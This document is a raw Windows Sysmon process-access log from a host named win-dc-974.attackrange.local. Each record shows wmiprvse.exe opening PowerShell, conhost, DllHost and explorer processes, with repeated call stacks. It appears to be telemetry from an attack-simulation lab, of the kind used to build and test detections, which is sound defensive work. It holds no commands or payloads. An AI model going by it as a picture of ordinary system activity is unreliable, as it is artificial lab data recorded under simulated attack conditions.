16:52:52.574{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-7AAA-00000000AD01}7324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237256Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.574{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-79AA-00000000AD01}13796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237255Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.574{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-78AA-00000000AD01}10508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237254Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.573{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237253Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.573{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237252Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.572{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237251Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.571{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237250Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.571{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237249Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.570{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237248Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.569{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237247Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.568{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237246Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.568{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237245Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.567{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237244Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.567{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237243Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.566{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237242Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.565{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237241Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.565{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237240Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.564{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237239Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.564{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237238Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.563{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237237Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 